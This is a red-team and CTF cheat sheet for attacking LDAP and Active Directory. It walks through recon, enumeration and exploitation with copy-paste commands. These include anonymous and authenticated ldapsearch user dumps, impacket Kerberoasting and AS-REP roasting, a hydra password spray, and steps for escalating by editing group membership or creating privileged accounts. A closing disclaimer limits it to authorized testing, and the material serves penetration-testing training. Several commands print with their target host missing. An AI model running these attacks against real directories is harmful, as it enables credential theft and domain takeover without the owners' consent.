0) What is LDAP?
LDAP is a directory access protocol commonly used to query and modify directory services (Active Directory, OpenLDAP). By default it runs on TCP/UDP port 389 (plaintext); LDAPS (LDAP over TLS) typically runs on 636. LDAP stores user accounts, group membership, computer objects, and configuration data — making it extremely valuable during engagements.
1) Recon Phase
- Discover LDAP service and version:
nmap -sV -p 389 --script=ldap-rootdse,ldap-search
- Query DNS for domain controllers (SRV records):
dig _ldap._tcp.dc._msdcs. SRV
- Passive recon: collect domain names, public LDAP/AD endpoints, and service principal names (SPNs) via OSINT
- Check for anonymous bind allowed (quick win)
Start by identifying if LDAP accepts anonymous binds and whether it advertises schema or rootDSE info. Domain controllers are high-priority targets.
2) Enumeration Phase
# Test anonymous bind and basic queries ldapsearch -x -h-b "" -s base namingContexts # Anonymous bind + enumerate common containers ldapsearch -x -h -b "dc=example,dc=com" "(objectClass=*)" cn,sn,mail # Authenticated enumeration (when creds available) ldapsearch -D "user@domain" -w 'password' -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName,memberOf,mail,distinguishedName # SPN enumeration (Kerberos targets) setspn -L # on Windows host or via tools that query LDAP # Use nmap NSE scripts for LDAP enumeration nmap --script ldap-rootdse,ldap-search -p389 # Use BloodHound ingestion (via SharpHound) when actually on-network to build AD graph
Look for: domain structure (OU’s), user accounts, privileged groups (Domain Admins, Enterprise Admins), computer accounts, SPNs (for Kerberoasting), service account names, and password policy details.
3) Exploitation Phase
- Anonymous bind => dump users/groups and password policy
ldapsearch -x -h -b "dc=example,dc=com" "(objectClass=user)"
- Kerberoasting (if SPNs found):
# request service tickets for SPNs and crack offline to recover service account passwords
- AS-REP roast (if accounts have DONT_REQ_PREAUTH):
GetTGT for user and crack offline if unsupported preauth
- LDAP credential brute-force / password spray (authorized only):
hydra -L users.txt -P passwords.txt ldap://
- AD ACL abuse / LDAP modify (if creds with enough rights):
- modify group membership to escalate
- create new user and add to privileged groups (authorized CTF only)
- Abuse LDAPS/StartTLS TLS misconfigurations to downgrade or capture creds on network (authorized lab)
- Use recovered credentials to access RDP/SMB/HTTP services
Focus on enumerating high-privilege principals and SPNs for Kerberoast. If write access exists, follow rules of engagement — changes to AD are high-impact and often scored in CTFs.
LDAP Info — What to Look For
- Anonymous bind allowed or weak anonymous access controls
- Exposed namingContexts / rootDSE revealing domain base DN
- Privileged groups membership (Domain Admins, Enterprise Admins)
- Service Principal Names (SPNs) for Kerberoasting
- Accounts without pre-auth (AS-REP roastable)
- Password policy details and lockout settings that affect spraying
- LDAP over plaintext (389) where STARTTLS is not required
Tools Required
sudo apt install nmap ldap-utils hydra
# Useful tooling:
# - impacket (GetUserSPNs, GetNPUsers) for Kerberoast / AS-REP
# - BloodHound + SharpHound for AD graphing (when on-network)
# - ldapdomaindump for quick dumps of AD via LDAP
# - python-ldap / ldap3 for scripted queries
Quick copy-paste command cheatsheet
# service discovery & rootDSE nmap -sV -p 389 --script=ldap-rootdse,ldap-search# check for anonymous bind & list namingContexts ldapsearch -x -h -b "" -s base namingContexts # anonymous bind & enumerate users (if allowed) ldapsearch -x -h -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName,distinguishedName,memberOf # authenticated query (when creds available) ldapsearch -x -D "administrator@example.com" -w 'Password123!' -b "dc=example,dc=com" "(objectClass=person)" cn,mail # Kerberoast: discover SPNs (impacket) GetUserSPNs.py -request -dc-ip -outputfile spns.txt domain/username:password # AS-REP roast (impacket) GetNPUsers.py -dc-ip -no-pass -outputfile asrep.json domain/ -usersfile users.txt # brute/spray (authorized) hydra -L users.txt -P passwords.txt ldap://
Red-team / CTF tips
- Anonymous bind and rootDSE give fast wins — capture base DN early.
- Scan for SPNs and AS-REP roastable accounts quickly — cracking those offline yields creds without noisy online attacks.
- Respect lockout policy — prefer Kerberoast/AS-REP over noisy full-account brute force in competition.
- Use BloodHound to prioritise high-value attack paths once you have credentials or enumeration data.
Citations
- RFC 4510 — LDAP: Technical Specification
- Nmap NSE — ldap-rootdse / ldap-search
- Impacket — useful AD / Kerberos tooling (GetUserSPNs, GetNPUsers)
Disclaimer: This guidance targets authorized testing and red-team/CTF contexts. Accessing or modifying directory data without explicit permission is illegal and unethical. AD modifications (user creation/group edits) are high-impact — only perform them within scope and per rules of engagement.